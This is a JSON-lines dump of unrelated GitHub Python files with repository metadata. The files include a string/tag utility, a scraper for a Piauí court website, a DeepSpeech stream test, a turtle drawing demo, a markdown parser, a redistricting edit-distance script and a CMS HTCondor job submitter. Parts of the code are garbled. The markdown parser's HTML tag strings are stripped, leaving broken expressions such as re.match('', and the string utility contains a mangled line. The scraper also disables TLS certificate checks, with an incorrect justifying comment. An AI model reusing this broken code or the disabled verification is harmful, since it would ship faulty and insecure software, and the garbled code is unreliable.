string.find(_t(tag))\n tag_end = string[tag_start:].find(\">\") + tag_start\n return tag_start, tag_end\n\n\ndef _detag(string: str) -> tuple:\n to_detag = string\n result = ()\n while (len(to_detag) != 0):\n tag, opening_end = _find_next_tag_and_tag_end(to_detag)\n content_end, closing_end = _find_content_and_tag_end(to_detag, tag)\n result += (str(to_detag[opening_end + 1:content_end]),)\n to_detag = str(to_detag[closing_end + 1:])\n return result\n\n\ndef list_tags_and_values(string: str) -> list:\n to_detag = string\n result = []\n while len(to_detag)!=0:\n tag, opening_end = _find_next_tag_and_tag_end(to_detag)\n if tag == '':\n break\n content_end, closing_end = _find_content_and_tag_end(to_detag, tag)\n result += [(tag, str(to_detag[opening_end + 1:content_end]),)]\n to_detag = str(to_detag[closing_end + 1:])\n return result\n\n\ndef _detag_given_tag(string: str, tag: str) -> tuple:\n tag_start, content_start = _find_tag_and_tag_end(string, tag)\n if tag_start == -1:\n result = \"\"\n remainder = string\n return result, remainder\n content_end, tag_end = _find_content_and_tag_end(string, tag)\n result = string[content_start + 1:content_end]\n result = result.replace(\" tuple:\n result = ()\n for tag in tags:\n value, string = _detag_given_tag(string, tag)\n result += (value,)\n return result\n\n\ndef detag_repeated(string: str, tag: str) -> list:\n results = []\n while (_t(tag) in string):\n result, string = _detag_given_tag(string, tag)\n results += [result]\n return results\n\n\ndef get_id_list(string: str) -> list:\n return [int(a) for a in (list(string[1:-1].split(\",\")))]\n\n\ndef _find_next_file(string: str):\n ending_of_file_tag = string.find(\"file>\")\n if ending_of_file_tag == -1:\n return -1, -1, 0, \"\"\n reversed_string= string[ending_of_file_tag::-1]\n order_of_depth = reversed_string.find(\"<\")-1 # AKA amount of ! bangs\n start_of_file_tag = ending_of_file_tag-1-order_of_depth\n end_of_closing_tag = string.find(\"\\\\file>\")+6\n start_of_content = string[start_of_file_tag:end_of_closing_tag].find(\">\")+1\n end_of_content = -start_of_content-1\n file_name = string[start_of_file_tag:end_of_closing_tag][start_of_content:end_of_content]\n return start_of_file_tag, end_of_closing_tag, order_of_depth, file_name\n\n\ndef increase_order(string: str, order: int) -> str:\n return string.replace(\"<\", \"<\"+\"!\"*order)\n\n\ndef load_files(string: str) -> str:\n start, end, order, file_name=_find_next_file(string)\n if start == -1:\n return string\n with open(root_path(file_name)) as file:\n file_content=file.read()\n return string[:start]+increase_order(file_content, order)+string[end:]\n\n\ndef unroot_path(path: str) -> str:\n if path is None:\n return None\n return path.replace(ROOT, \"\", 1)\n\n\ndef root_path(path: str) -> str:\n if path is None:\n return None\n return ROOT + path\n\n\ndef read_and_clean_file(path: str) -> str:\n with open(root_path(path)) as file:\n file_contents = file.read()\n int_tags = detag_repeated(file_contents, \"int\")\n file_contents += \"\".join(int_tags)\n return file_contents\n","repo_name":"0316d07cb3844f37b72d3883269fc780/reimagined-potato","sub_path":"utility/src/string_utils.py","file_name":"string_utils.py","file_ext":"py","file_size_in_byte":4240,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"19827502505","text":"import re\nimport requests\nfrom bs4 import BeautifulSoup\n\n\ndef cnj_breaker(cnj):\n\tcnj_regex = re.compile(r'(\\d{7})-(\\d{2}).(\\d{4}).(\\d).(\\d{2}).(\\d{4})')\n\tcnj_result = cnj_regex.search(cnj)\n\tif not cnj_result:\n\t\tprint('nao achei')\n\t\n\treturn cnj_result\n\n\ndef cnj_cleaner(cnj):\n\t\n\treturn cnj.replace('-','').replace('.','') \n\ndef get_params(cnj):\n\tbroken_cnj = cnj_breaker(cnj)\t\n\tclean_cnj = cnj_cleaner(cnj)\n\n\tparams = {\n\t'NNNNNNN':broken_cnj.group(1),\n\t'DD':broken_cnj.group(2),\n\t'AAAA':broken_cnj.group(3),\n\t'T':broken_cnj.group(4),\n\t'TR':broken_cnj.group(5),\n\t'OOOO':broken_cnj.group(6),\n\t'num_unico':clean_cnj\n\t}\n\t\n\treturn params\n\ndef get_lawsuit(cnj):\n\tprint('Fazendo requisicao do processo')\n\turl = 'http://www.tjpi.jus.br/e-tjpi/consulta_processo.php'\n\tparams = get_params(cnj)\n\tresponse = requests.get(url,params=params,verify=False)\n\t#precisa colocar o verify nesse caso pq a url so eh http e nao https\n\tlawsuit = parser(response.content)\n\t\n\treturn lawsuit\n\ndef parser(data):\n\tprint('Filtrando as informacoes')\n\tparsed = BeautifulSoup(data,'html.parser')\n\ttext = parsed.text\n\tlawsuit = {\n\t'number': get_number(text),\n\t'nature': get_element(parsed,'Natureza'),\n\t'reporter': get_element(parsed,'Relator'),\n\t'value': get_element(parsed, 'Valor da Causa'),\n\t'_class': get_element_list(parsed, 'Classe Processual'),\n\t'subject': get_element_list(parsed, 'Assuntos'),\n\t'activity_list': get_activity_list(parsed),\n\t'get_people': get_people(parsed)\n\t}\n\t\n\treturn lawsuit\n\ndef get_number(data):\n\tprint('Extraindo o numero do processo')\n\n\tresult = re.search(r'\\d{7}-\\d{2}.\\d{4}.\\d.\\d{2}.\\d{4}',data)\n\tif result: \n\t\treturn result.group()\t\n\ndef get_element(data,field):\n\thead = data.find('dt',text=field)\n\tnext_element = head.find_next_sibling()\n\n\treturn next_element.text \n\ndef get_element_list(data,field):\n\telement = get_element(data,field)\n\t\n\treturn element.split('>')\n\ndef get_activity_list(data):\n\tactivity_list = []\n\tactivity_table = data.find('div',id='movimentacoes')\t\n\tactivity_tbody = activity_table.find('tbody')\n\ttrs = activity_tbody.find_all('tr')\n\tfor tr in trs:\n\t\ttds = tr.find_all('td')\n\t\tdate_role = normalize_text(tds[1].text)\n\t\tdate = extract_by_regex(re.compile(r'(\\d{2}/\\d{2}/\\d{2,4})'), date_role)\n\t\tactivity = {\n\t\t'date': date,\n\t\t'text': normalize_text(tds[2].text)\n\t\t}\n\t\tactivity_list.append(activity)\n\t\n\treturn\tactivity_list\n\ndef normalize_text(text):\n\n\treturn text.replace('\\n','').replace('\\t','').strip()\n# sempre que for pegar os dados na html o parametro eh data,\n# quando for usar o regex, usa text\t\n\ndef get_people(data):\n\trelated_people = []\n\tpeople_table = data.find('div', id='partes')\n\tdls = people_table.find_all('dl')\n\tfor dl in dls:\n\t\tdts = dl.find_all('dt')\n\t\tfor dt in dts:\n\t\t\trole = dt.text\n\t\t\tparties = dt.findNext('ul')\n\t\t\tpeople = parties.find_all('li')\n\t\t\tfor li in people:\n\t\t\t\tperson = {\n\t\t\t\t'name': normalize_text(li.text),\n\t\t\t\t'role': role\n\t\t\t\t}\n\t\t\t\trelated_people.append(person)\n\tlawyers = get_lawyers(people_table)\n\trelated_people.extend(lawyers)\n# diferenca entre append e extend. append nao serve para listas, apenas unico item.\n\treturn related_people\n\ndef get_lawyers(data):\n\tlawyers = []\n\tlawyers_table = data.find_all('fieldset')[-1]\n\tlawyers_list = lawyers_table.find_all('li')\n\tfor li in lawyers_list:\n\t\tlawyer = {\n\t\t'name': normalize_text(li.text),\n\t\t'role': 'Advogado(a)'\n\t\t}\n\t\tlawyers.append(lawyer)\n\n\treturn lawyers\n\t\t\ndef extract_by_regex(regex,data):\n\n\tresult = regex.search(data)\n\tif result:\n\t\t\n\t\treturn result.group(1).strip()\t\n\n\nprint(get_lawsuit('0002508-53.2014.8.18.0000'))","repo_name":"maripnascimento/tjpi","sub_path":"crawler.py","file_name":"crawler.py","file_ext":"py","file_size_in_byte":3537,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"27306140932","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\nfrom __future__ import absolute_import, division, print_function\n\nimport argparse\nimport numpy as np\nimport wave\n\nfrom deepspeech import Model\n\n\n# These constants control the beam search decoder\n\n# Beam width used in the CTC decoder when building candidate transcriptions\nBEAM_WIDTH = 500\n\n# The alpha hyperparameter of the CTC decoder. Language Model weight\nLM_ALPHA = 0.75\n\n# The beta hyperparameter of the CTC decoder. Word insertion bonus.\nLM_BETA = 1.85\n\n\ndef main():\n parser = argparse.ArgumentParser(description='Running DeepSpeech inference.')\n parser.add_argument('--model', required=True,\n help='Path to the model (protocol buffer binary file)')\n parser.add_argument('--lm', nargs='?',\n help='Path to the language model binary file')\n parser.add_argument('--trie', nargs='?',\n help='Path to the language model trie file created with native_client/generate_trie')\n parser.add_argument('--audio1', required=True,\n help='First audio file to use in interleaved streams')\n parser.add_argument('--audio2', required=True,\n help='Second audio file to use in interleaved streams')\n args = parser.parse_args()\n\n ds = Model(args.model, BEAM_WIDTH)\n\n if args.lm and args.trie:\n ds.enableDecoderWithLM(args.lm, args.trie, LM_ALPHA, LM_BETA)\n\n fin = wave.open(args.audio1, 'rb')\n fs1 = fin.getframerate()\n audio1 = np.frombuffer(fin.readframes(fin.getnframes()), np.int16)\n fin.close()\n\n fin = wave.open(args.audio2, 'rb')\n fs2 = fin.getframerate()\n audio2 = np.frombuffer(fin.readframes(fin.getnframes()), np.int16)\n fin.close()\n\n stream1 = ds.createStream()\n stream2 = ds.createStream()\n\n splits1 = np.array_split(audio1, 10)\n splits2 = np.array_split(audio2, 10)\n\n for part1, part2 in zip(splits1, splits2):\n ds.feedAudioContent(stream1, part1)\n ds.feedAudioContent(stream2, part2)\n\n print(ds.finishStream(stream1))\n print(ds.finishStream(stream2))\n\nif __name__ == '__main__':\n main()\n","repo_name":"G-Slient/DeepSpeech-Speech-to-text","sub_path":"native_client/test/concurrent_streams.py","file_name":"concurrent_streams.py","file_ext":"py","file_size_in_byte":2141,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"39496965376","text":"import turtle \n\n# turtle.tracer(0, 0)\n# turtle.update()\n\ncolors = ['orange', 'red', 'pink', 'yellow', 'blue', 'green']\nfor x in range(50):\n turtle.pencolor(colors[x % 6])\n turtle.width(x / 5 + 1)\n turtle.forward(x)\n turtle.left(20)\n \n\nstar = turtle.Turtle()\nstar.penup()\nstar.goto(-400, 0)\nstar.pendown()\n\nfor i in range(22):\n star.forward(50 + 90)\n star.right(144 + 90)\n \n\n\npolygon = turtle.Turtle()\npolygon.penup()\npolygon.goto(-100, 150)\npolygon.pendown()\n\nnum_sides = 6\nside_length = 160\nangle = 360.0 / num_sides \n\nfor i in range(num_sides):\n polygon.forward(side_length)\n polygon.right(angle)\n\n\nturtle.exitonclick()\nturtle.mainloop()","repo_name":"founek2/school-projects","sub_path":"Python/PSI-udp/example_turtle.py","file_name":"example_turtle.py","file_ext":"py","file_size_in_byte":669,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"6369351687","text":"\"\"\" module to parse the markdown \"\"\" # add the module doc string\nimport re\n\n\ndef parse(markdown: str):\n \"\"\" parse the markdown \"\"\" # add the class doc string\n lines = markdown.splitlines() # change split('\\n') to splitlines()\n res = ''\n in_list = False\n in_list_append = False\n for i in lines:\n if re.match('###### (.*)', i) is not None:\n i = '
' + i[7:] + '
'\n elif re.match('##### (.*)', i) is not None:\n i = '
' + i[6:] + '
'\n elif re.match('#### (.*)', i) is not None:\n i = '

' + i[5:] + '

'\n elif re.match('### (.*)', i) is not None:\n i = '

' + i[4:] + '

'\n elif re.match('## (.*)', i) is not None:\n i = '

' + i[3:] + '

'\n elif re.match('# (.*)', i) is not None:\n i = '

' + i[2:] + '

'\n mark = re.match(r'\\* (.*)', i)\n if mark:\n if not in_list:\n in_list = True\n is_bold = False\n is_italic = False\n curr = mark.group(1)\n mark1 = re.match('(.*)__(.*)__(.*)', curr)\n if mark1:\n curr = mark1.group(1) + '' + \\\n mark1.group(2) + '' + mark1.group(3)\n is_bold = True\n mark1 = re.match('(.*)_(.*)_(.*)', curr)\n if mark1:\n curr = mark1.group(1) + '' + mark1.group(2) + \\\n '' + mark1.group(3)\n is_italic = True\n i = '
  • ' + curr + '
  • '\n else:\n is_bold = False\n is_italic = False\n curr = mark.group(1)\n mark1 = re.match('(.*)__(.*)__(.*)', curr)\n if mark1:\n is_bold = True\n mark1 = re.match('(.*)_(.*)_(.*)', curr)\n if mark1:\n is_italic = True\n if is_bold:\n curr = mark1.group(1) + '' + \\\n mark1.group(2) + '' + mark1.group(3)\n if is_italic:\n curr = mark1.group(1) + '' + mark1.group(2) + \\\n '' + mark1.group(3)\n i = '
  • ' + curr + '
  • '\n else:\n if in_list:\n in_list_append = True\n in_list = False\n\n mark = re.match(''\n mark = re.match('(.*)__(.*)__(.*)', i)\n if mark:\n i = mark.group(1) + '' + mark.group(2) + '' + mark.group(3)\n mark = re.match('(.*)_(.*)_(.*)', i)\n if mark:\n i = mark.group(1) + '' + mark.group(2) + '' + mark.group(3)\n if in_list_append:\n i = '
' + i\n in_list_append = False\n res += i\n if in_list:\n res += ''\n return res\n","repo_name":"barbieri97/exercism","sub_path":"python/markdown/markdown.py","file_name":"markdown.py","file_ext":"py","file_size_in_byte":2994,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"25865890721","text":"#!/usr/bin/env python3\n\n\"\"\"\nCalculate the edit distance between a map & the baseline map.\n\nFor example:\n\n$ scripts/calc_edit_distances.py\n$ scripts/calc_edit_distances.py -s NC -o ~/Downloads/NC/\n$ scripts/calc_edit_distances.py -s NC -o ~/Downloads/NC/ -c\n$ scripts/calc_edit_distances.py -s NC -o ~/Downloads/NC/ -c > intermediate/NC/NC_2022_Congress_edit_distances.txt\n\nFor documentation, type:\n\n$ scripts/calc_edit_distance.py -h\n\n\"\"\"\n\n\nimport argparse\nfrom argparse import ArgumentParser, Namespace\n\nimport os\nfrom operator import itemgetter\n\nfrom pg import *\n\n\ndef parse_args() -> Namespace:\n parser: ArgumentParser = argparse.ArgumentParser(\n description=\"Calculate the edit distance between a map & the baseline map.\"\n )\n\n parser.add_argument(\n \"-s\",\n \"--state\",\n default=\"NC\",\n help=\"The two-character state code (e.g., NC)\",\n type=str,\n )\n parser.add_argument(\n \"-o\",\n \"--output\",\n default=\"~/Downloads/NC/\",\n help=\"Path to the output root\",\n type=str,\n )\n parser.add_argument(\n \"-c\", \"--header\", dest=\"header\", action=\"store_true\", help=\"Generate a header\"\n )\n\n parser.add_argument(\n \"-v\", \"--verbose\", dest=\"verbose\", action=\"store_true\", help=\"Verbose mode\"\n )\n\n args: Namespace = parser.parse_args()\n return args\n\n\ndef main() -> None:\n \"\"\"Calculate the edit distance between a map & the baseline map.\"\"\"\n\n args: Namespace = parse_args()\n\n xx: str = args.state\n output_dir: str = os.path.expanduser(args.output)\n header: bool = args.header\n\n verbose: bool = args.verbose\n\n # Read the canonicalized baseline map\n\n baseline_csv: str = f\"{xx}_{cycle}_{plan_type}_Baseline_canonical.csv\"\n baseline_path: str = os.path.join(output_dir, baseline_csv)\n baseline_blocks: list[dict] = read_csv(baseline_path, [str, int])\n\n # Read the block-to-precinct mapping\n\n unit: str = study_unit(xx)\n\n block_precinct_csv: str = path_to_file([preprocessed_data_dir, xx]) + file_name(\n [xx, cycle, \"block\", unit], \"_\", \"csv\"\n )\n block_precinct: list[dict] = read_csv(block_precinct_csv, [str, str])\n precinct_by_block: dict[str, str] = {\n row[\"BLOCK\"]: row[\"PRECINCT\"] for row in block_precinct\n }\n\n # Map block assignments to precinct assignments\n\n baseline_assignments: dict[str, set[int]] = dict()\n\n for row in baseline_blocks:\n block: str = row[\"GEOID\"] if \"GEOID\" in row else row[\"GEOID20\"]\n district: int = row[\"DISTRICT\"] if \"DISTRICT\" in row else row[\"District\"]\n\n precinct: str = precinct_by_block[block]\n\n if precinct not in baseline_assignments:\n baseline_assignments[precinct] = set()\n\n baseline_assignments[precinct].add(district)\n\n #\n\n compare_maps: list[str] = [\n \"Official\",\n \"Proportional\",\n \"Competitive\",\n \"Minority\",\n \"Compact\",\n \"Splitting\",\n ]\n\n edits: dict[str, int] = dict()\n splits: dict[str, int] = dict()\n\n for label in compare_maps:\n # Read the canonicalized comparison map\n\n compare_csv: str = (\n f\"{xx}_{yyyy}_{plan_type}_{label}_canonical.csv\"\n if label != \"Official\"\n else f\"{xx}_{yyyy}_{plan_type}_Official.csv\"\n )\n compare_path: str = os.path.join(output_dir, compare_csv)\n compare_blocks: list[dict] = read_csv(compare_path, [str, int])\n\n # Map block assignments to precinct assignments\n\n compare_assignments: dict[str, set[int]] = dict()\n\n for row in compare_blocks:\n block: str = row[\"GEOID\"] if \"GEOID\" in row else row[\"GEOID20\"]\n district: int = row[\"DISTRICT\"] if \"DISTRICT\" in row else row[\"District\"]\n\n precinct: str = precinct_by_block[block]\n\n if precinct not in compare_assignments:\n compare_assignments[precinct] = set()\n\n compare_assignments[precinct].add(district)\n\n # Compare precinct assignments\n\n nedits: int = 0\n nsplits: int = 0\n\n for k, v in baseline_assignments.items():\n if k not in compare_assignments:\n print(f\"Precinct {k} not in {label}\")\n continue\n\n baseline_district: int = next(iter(v)) # No split precincts in baseline\n nsplits += 1 if len(compare_assignments[k]) > 1 else 0\n compare_assignments[k].discard(baseline_district)\n nedits += len(compare_assignments[k])\n\n edits[label] = nedits\n splits[label] = nsplits\n\n pass\n\n # Print the results\n\n if header:\n print(\n \"{0:^12}\".format(\"XX/precincts\"),\n \"{0:^12}\".format(\"Official\"),\n \"{0:^12}\".format(\"Proportional\"),\n \"{0:^12}\".format(\"Competitive\"),\n \"{0:^12}\".format(\"Minority\"),\n \"{0:^12}\".format(\"Compact\"),\n \"{0:^12}\".format(\"Splitting\"),\n )\n print(\n \"{0:12}\".format(\"------------\"),\n \"{0:12}\".format(\"------------\"),\n \"{0:12}\".format(\"------------\"),\n \"{0:12}\".format(\"------------\"),\n \"{0:12}\".format(\"------------\"),\n \"{0:12}\".format(\"------------\"),\n \"{0:12}\".format(\"------------\"),\n )\n\n print(\n \"{0:>12}\".format(xx),\n \"{0:>12,}\".format(edits[\"Official\"]),\n \"{0:>12,}\".format(edits[\"Proportional\"]),\n \"{0:>12,}\".format(edits[\"Competitive\"]),\n \"{0:>12,}\".format(edits[\"Minority\"]),\n \"{0:>12,}\".format(edits[\"Compact\"]),\n \"{0:>12,}\".format(edits[\"Splitting\"]),\n \"edits\",\n )\n print(\n \"{0:>12,}\".format(len(baseline_assignments)),\n \"{0:>12,}\".format(splits[\"Official\"]),\n \"{0:>12,}\".format(splits[\"Proportional\"]),\n \"{0:>12,}\".format(splits[\"Competitive\"]),\n \"{0:>12,}\".format(splits[\"Minority\"]),\n \"{0:>12,}\".format(splits[\"Compact\"]),\n \"{0:>12,}\".format(splits[\"Splitting\"]),\n \"splits\",\n )\n\n\nif __name__ == \"__main__\":\n main()\n\n### END ###\n","repo_name":"alecramsay/pg","sub_path":"scripts/calc_edit_distances.py","file_name":"calc_edit_distances.py","file_ext":"py","file_size_in_byte":6063,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"8024452266","text":"import os, re\nimport argparse\nimport subprocess\nimport fileinput\nfrom tqdm import tqdm\nfrom datetime import datetime\n\n# Define global variables\nCMS_VER = \"CMSSW_10_2_13\"\nSCRAM_ARCH = \"slc7_amd64_gcc700\"\nEOS_PATH = \"/store/user/lpcjj/CaloScouting/rootTrees_reduced/\"\nCUT_FILE = \"config/cutFile_mainDijetCaloScoutingSelection.txt\"\n\ndef change_era_from_mainDijetAnalyzer(c_file_path, ERA, DIJET_ANALYZER):\n for line in fileinput.input(c_file_path, inplace=True):\n # Find the line with eraType and replace the value\n if 'std::string dataYear' in line:\n line = 'std::string dataYear = \"%s\";\\n' % (ERA)\n # Print modifies the file in-place\n print(line, end='')\n\n original_dir = os.getcwd()\n os.chdir(os.path.dirname(os.getcwd())) \n subprocess.run(['ln -sf %s src/analysisClass.C' % (DIJET_ANALYZER)], shell=True, check=True, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)\n os.chdir(original_dir)\n\ndef change_JSON_path(CUT_FILE, GOLDEN_JSON):\n for line in fileinput.input(\"../%s\" % (CUT_FILE), inplace=True):\n if line.startswith(\"JSON\"):\n line = \"JSON %s\\n\" % (GOLDEN_JSON)\n # Print modifies the file in-place\n print(line, end='')\n\n\ndef parse_config_file(config_path):\n # Parse the config file\n with open(config_path, 'r') as file:\n lines = file.readlines()\n dataset = lines[0].split('=')[1].strip()\n dataset_type = dataset.split('/')[1]\n year = dataset.split('/')[2].replace('-', '_')\n year_just_number = re.findall(r'\\d+', year)[0]\n if len(year_just_number) < 4: year_just_number = re.findall(r'\\d+', year)[1] ## For QCD\n reco_type = dataset.split('/')[3]\n input_list = lines[1].split('=')[1].strip()\n interval = int(lines[2].split('=')[1].strip())\n DIJET_ANALYZER = lines[3].split('=')[1].strip()\n GOLDEN_JSON = lines[4].split('=')[1].strip()\n ERA = lines[5].split('=')[1].strip()\n return dataset_type, year, reco_type, input_list, interval, year_just_number, DIJET_ANALYZER, ERA, GOLDEN_JSON\n\n\ndef split_input_list(input_list, interval):\n # Split the input list\n with open(input_list, 'r') as file:\n lines = file.readlines()\n chunks = [lines[i:i + interval] for i in range(0, len(lines), interval)]\n original_dir = os.getcwd()\n os.chdir(os.path.dirname(os.getcwd()))\n test_root = chunks[0][0].replace(\"\\n\", \"\")\n print(\"Initiating 'make_rootNtupleClass.sh' script...\")\n try:\n subprocess.run('yes | ./scripts/make_rootNtupleClass.sh -f %s -t dijetscouting/events' % (test_root), shell=True, check=True, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)\n print(\"\\033[92m The make_rootNtupleClass.sh has been successful!\\033[0m\")\n except subprocess.CalledProcessError:\n print(\"\\033[91m The make_rootNtupleClass.sh encountered an error and couldn't complete!\\033[0m\")\n\n\n\n print(\"Initiating 'make' process...\")\n try:\n subprocess.run('make clean', shell=True, check=True, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)\n subprocess.run('make', shell=True, check=True, stdout=subprocess.DEVNULL, stderr=subprocess.DEVNULL)\n print(\"\\033[92m The 'make' process has been successful!\\033[0m\")\n except subprocess.CalledProcessError:\n print(\"\\033[91m The 'make' process encountered an error and couldn't complete!\\033[0m\")\n\n os.chdir(original_dir)\n return chunks, len(chunks)\n\n\ndef create_condor_folder(dataset_type, year, reco_type):\n # Create condor folder\n now = datetime.now()\n date_time = now.strftime(\"%d%B%Y_%H\")\n condor_folder = f\"cjobs_{dataset_type}_{year}_{reco_type}_{date_time}\"\n os.makedirs(condor_folder, exist_ok=True)\n return condor_folder, date_time\n\n\ndef create_sh_content(dataset_type, year, reco_type, date_time, i, list_file_path, year_just_number, test_root_file, DIJET_ANALYZER):\n # Define variable for job name\n job_name = \"{0}_{1}_Condor_n{2}\".format(dataset_type, year, i)\n rootPrefix=\"root://cmseos.fnal.gov/\"\n\n sh_content = \"\"\"#!/bin/tcsh\n\nsource /cvmfs/cms.cern.ch/cmsset_default.csh\ntar -xf {0}.tar.gz\nrm {0}.tar.gz\nexport SCRAM_ARCH={11}\ncd {0}/src\n\necho \"strat renaming\"\nscramv1 b ProjectRename\n\necho \"next- setting eval\"\neval `scramv1 runtime -csh`\n\ncd CMSDIJET/DijetRootTreeAnalyzer\npwd\nls -lhtr\n\necho \"\"\necho \"Job Starting...\"\necho \"\"\n\nln -sf {10} src/analysisClass.C\n\nyes | ./scripts/make_rootNtupleClass.sh -f {9} -t dijetscouting/events\n\nmake clean\nmake\n\n./main {1} {2} dijetscouting/events {3} {3}\n\necho \"\"\necho \"Job END!\"\necho \"\"\n\nmkdir -p \"/eos/uscms/{4}/{8}/{5}/{5}_{6}\"\necho \"/eos/uscms/{4}/{8}/{5}/{5}_{6}\"\n\nxrdcp -f {3}_reduced_skim.root {7}/{4}/{8}/{5}/{5}_{6}/{3}_reduced_skim.root\nxrdcp -f {3}.root {7}/{4}/{8}/{5}/{5}_{6}/{3}.root\nxrdcp -f {3}.dat {7}/{4}/{8}/{5}/{5}_{6}/{3}.dat\n\necho \"\"\necho \"Starting cleanup...\"\necho \"\"\nls -lhtr\nrm {3}_reduced_skim.root\nrm {3}.root\nrm {3}.dat\n\necho \"\"\necho \"Remaining files after cleanup...\"\necho \"\"\nls -lhtr\n\necho \"DONE!\"\n\"\"\".format(CMS_VER, list_file_path, CUT_FILE, job_name, EOS_PATH, dataset_type, year, rootPrefix, year_just_number, test_root_file, DIJET_ANALYZER, SCRAM_ARCH)\n\n return sh_content\n\n\n\ndef create_jdl_content(dataset_type, year, reco_type, date_time, i, sh_file_path):\n # Get the full path for the Executable\n full_path = os.path.join(os.getcwd(), sh_file_path)\n\n jdl_content = \"\"\"universe = vanilla\nExecutable = {0}\nShould_Transfer_Files = YES\nWhenToTransferOutput = ON_EXIT_OR_EVICT\nTransfer_Input_Files = {1}.tar.gz, {2}\nOutput = cjob_$(Cluster)_$(Process).stdout\nError = cjob_$(Cluster)_$(Process).stderr\nLog = cjob_$(Cluster)_$(Process).log\n#Requirements = (Arch == \"x86_64\") && (OpSys == \"LINUX\") && (OpSysMajorVer == 7) && (OpSysAndVer == \"CentOS7\")\nstream_output = True\nstream_error = True\n+JobFlavour = \"nextweek\"\nQueue 1\"\"\".format(str(full_path), str(CMS_VER), str(sh_file_path))\n return jdl_content\n\n\n\ndef create_submit_all_script(total_files, condor_folder, dataset_type, year, reco_type):\n # Create the submit_all.py file\n submit_all_path = os.path.join(condor_folder, \"submit_all.py\")\n with open(submit_all_path, 'w') as file:\n file.write(\"#!/usr/bin/env python\\n\")\n file.write(\"import os\\n\")\n file.write(\"import subprocess\\n\")\n file.write(\"from tqdm import tqdm\\n\")\n file.write(\"\\n\")\n file.write(f\"with tqdm(total={total_files}, unit='job') as pbar:\\n\")\n file.write(f\" for i in range({total_files}):\\n\")\n file.write(f\" jdl_file_path = os.path.join('{dataset_type}_{year}_{reco_type}_n%d.jdl' % i)\\n\")\n file.write(\" os.system('condor_submit %s > cjob.txt' % (jdl_file_path)) \\n\")\n #file.write(\" proc = subprocess.Popen(['condor_submit', jdl_file_path], stdout=subprocess.PIPE, stderr=subprocess.STDOUT, encoding='utf-8', errors='replace')\\n\")\n #file.write(\" relevant_line = ''\\n\")\n #file.write(\" for line in iter(proc.stdout.readline, ''):\\n\")\n #file.write(\" relevant_line = line.strip().split('\\\\n')[-1]\\n\")\n #file.write(\" pbar.update(1 if relevant_line else 0)\\n\")\n file.write(\" pbar.update(1)\\n\")\n file.write(\"\\n\")\n\n # Change permissions of the submit_all.py file\n os.chmod(submit_all_path, 0o755)\n\n\n\ndef create_files(dataset_type, year, reco_type, date_time, condor_folder, chunks, year_just_number, DIJET_ANALYZER):\n # Create files\n os.makedirs(condor_folder, exist_ok=True)\n\n for i, chunk in enumerate(tqdm(chunks, unit='file')):\n list_file_name = f\"{dataset_type}_{year}_{reco_type}_n{i}.txt\"\n list_file_path = os.path.join('lists', dataset_type, f\"{dataset_type}_{year}_{reco_type}_{date_time}\", list_file_name)\n \n os.makedirs(os.path.dirname(os.path.join('../', list_file_path)), exist_ok=True)\n with open(os.path.join('../', list_file_path), 'w') as file:\n file.write(''.join(chunk))\n\n # Create .sh file\n sh_file_name = f\"{dataset_type}_{year}_{reco_type}_n{i}.csh\"\n sh_file_path = os.path.join(condor_folder, sh_file_name)\n with open(sh_file_path, 'w') as file:\n file.write(create_sh_content(dataset_type, year, reco_type, date_time, i, list_file_path, year_just_number, chunks[0][0].replace(\"\\n\", \"\"), DIJET_ANALYZER))\n os.chmod(sh_file_path, 0o755)\n\n # Create .jdl file\n jdl_file_name = f\"{dataset_type}_{year}_{reco_type}_n{i}.jdl\"\n jdl_file_path = os.path.join(condor_folder, jdl_file_name)\n with open(jdl_file_path, 'w') as file:\n file.write(create_jdl_content(dataset_type, year, reco_type, date_time, i, sh_file_path))\n\n\n print(\"Preparing the .tar.gz file. Please be patient!\")\n prev_dir = os.getcwd()\n # Execute tar command\n cmssw_base = os.path.dirname(os.getenv(\"CMSSW_BASE\"))\n os.chdir(cmssw_base) # Go to the CMSSW directory\n tar_command = \"tar --exclude-vcs -czf {0}.tar.gz --exclude=tmp --exclude=\\\"*root\\\" --exclude=\\\"*tar.gz\\\" -C {0}/.. {0}\".format(CMS_VER)\n os.system(tar_command)\n\n # Move tar file to condor_folder\n move_command = \"mv %s/%s.tar.gz %s/%s\" % (cmssw_base, CMS_VER, prev_dir, condor_folder)\n os.system(move_command)\n os.chdir(prev_dir)\n\ndef submit_jobs(condor_folder):\n print(\"Sending jobs to Condor. Please be patient!\")\n original_dir = os.getcwd()\n os.chdir(condor_folder)\n os.system(\"python3 submit_all.py\")\n os.chdir(original_dir)\n\n\ndef main():\n parser = argparse.ArgumentParser()\n parser.add_argument('-c', '--config', help='Path to the configuration file', required=True)\n args = parser.parse_args()\n\n dataset_type, year, reco_type, input_list, interval, year_just_number, DIJET_ANALYZER, ERA, GOLDEN_JSON = parse_config_file(args.config)\n change_era_from_mainDijetAnalyzer(\"../src/%s\" % (DIJET_ANALYZER), ERA, DIJET_ANALYZER)\n change_JSON_path(CUT_FILE, GOLDEN_JSON)\n chunks, total_files = split_input_list(input_list, interval)\n condor_folder, date_time = create_condor_folder(dataset_type, year, reco_type)\n create_files(dataset_type, year, reco_type, date_time, condor_folder, chunks, year_just_number, DIJET_ANALYZER)\n create_submit_all_script(total_files, condor_folder, dataset_type, year, reco_type)\n submit_jobs(condor_folder)\n\n\nif __name__ == \"__main__\":\n main()\n\n","repo_name":"asimsek/CMSDijetCaloScoutingRun2","sub_path":"dijetCondor/condor_submit_Data.py","file_name":"condor_submit_Data.py","file_ext":"py","file_size_in_byte":10394,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"22034316587","text":"#!/usr/bin/python3\nimport sys\nfrom typing import Tuple\nfrom quo.completion import NestedCompleter\nfrom quo.history import MemoryHistory\nfrom 